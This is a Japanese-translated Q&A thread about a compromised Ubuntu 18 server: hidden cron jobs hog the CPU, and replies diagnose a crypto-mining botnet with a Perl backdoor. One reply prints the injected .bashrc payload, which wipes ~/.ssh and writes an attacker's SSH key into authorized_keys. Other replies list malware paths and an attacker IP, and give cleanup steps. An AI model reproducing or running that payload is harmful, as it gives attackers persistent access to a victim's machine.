ストレンジクロンジョブはCPU Ubuntu 18 LTS Serverの100％を占有します

私はweのcronジョブを表示し続けていますが、それらが何をするのかわかりません。通常、kill -9を発行してそれらを停止します。CPUの100％を占有し、チェックするまで数日間実行できます。誰もがこれが何を意味するか知っていますか？

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

昨日7/24/2019の時点で完全に最新のUbuntu 18 LTSサーバーを実行しています

更新

すべてのフィードバックに感謝します。影響を受けたのはOSドライブだけだったので、すべてのデータドライブとアプリケーションドライブを切断しました。少なくともそのようなことは適切に行いました。より多くのセキュリティとより安全な方法で、完全に再構築します。

お使いのマシンには、おそらくクリプトマイナー感染があります。Security Centerを使用してAzureの仮想マシンを実際に検出すると、他の誰かが同様のファイル名と動作を報告しているのを見ることができます。参照してください私のUbuntuのサーバーがウイルスを持っている...私はそれを設置しましたが、私はそれを取り除くことができない... Redditの上。

そのマシンを信頼できなくなったため、再インストールする必要があります。バックアップの復元には注意してください。

お使いのマシンは暗号マイナー攻撃に感染しています。また、過去にも同様のランサムウェア攻撃に直面し、データベースが侵害されました。マシンのSQLダンプを取得し、マシンを再プロビジョニングしました（私のマシンはAWS EC2でホストされているVMであったため）。また、マシンのセキュリティグループを変更してSSHアクセスをロックダウンし、パスワードを変更しました。また、ログを有効にしてクエリを記録し、毎晩S3にエクスポートします。

私にも同じことが起こり、昨日気づきました。ファイルをチェックする/var/log/syslogと、このIP（185.234.218.40）がcronjobsを自動的に実行しているように見えました。

http://whatismyipaddress.com（https://whatismyipaddress.com/ip/185.234.218.40）で確認しましたが、いくつかのレポートがあります。これらのファイルはトロイの木馬によって編集されました。

• .bashrc
• .ssh / authorized_keys

私はこれを.bashrc（bashが開かれるたびに実行されます）の終わりに見つけました：

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

authorized_keysファイルを削除します。これは、パスワードなしで接続できるSSHキーのリストです。次に、攻撃者のSSHキーを追加します。

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

さらに、次のフォルダを見つけました：/tmp/.X13-unix/.rsyncすべてのマルウェアがある場所。/tmp/.X13-unix/.rsync/c/ip70,000個のIPアドレスを含むファイルを見つけましたが、これはおそらく他の被害者またはノードサーバーです。

2つの解決策があります：A：

• ポート22など必要な他の発信接続を除くすべての発信接続をブロックするファイアウォールを追加し、fail2banを有効にします。これは、Xがパスワードの入力に失敗した後にIPアドレスを禁止するプログラムです。

• すべてのcronジョブを強制終了します： ps aux | grep cron、表示されるPIDを強制終了します

• パスワードを安全なものに変更します

B：

• 必要または必要なファイルまたはフォルダーをバックアップします

• サーバーをリセットしてUbuntuを再インストールするか、新しいドロップレットを直接作成します

  Thom Wiggersが言ったように、あなたは確かにビットコインマイニングボットネットの一部であり、サーバーにはバックドアがあります。バックドアは、perlエクスプロイト、ここにあるファイルを使用します：/tmp/.X13-unix/.rsync/b/run、これを含む（https://pastebin.com/ceP2jsUy）

私が見つけた最も不審なフォルダーは次のとおりです。

• /tmp/.X13-unix/.rsync

• ~/.bashrc （編集された）

• ~/.firefoxcatche

最後に、Perlバックドアに関連する記事があります：https : //blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

これがあなたのお役に立てば幸いです。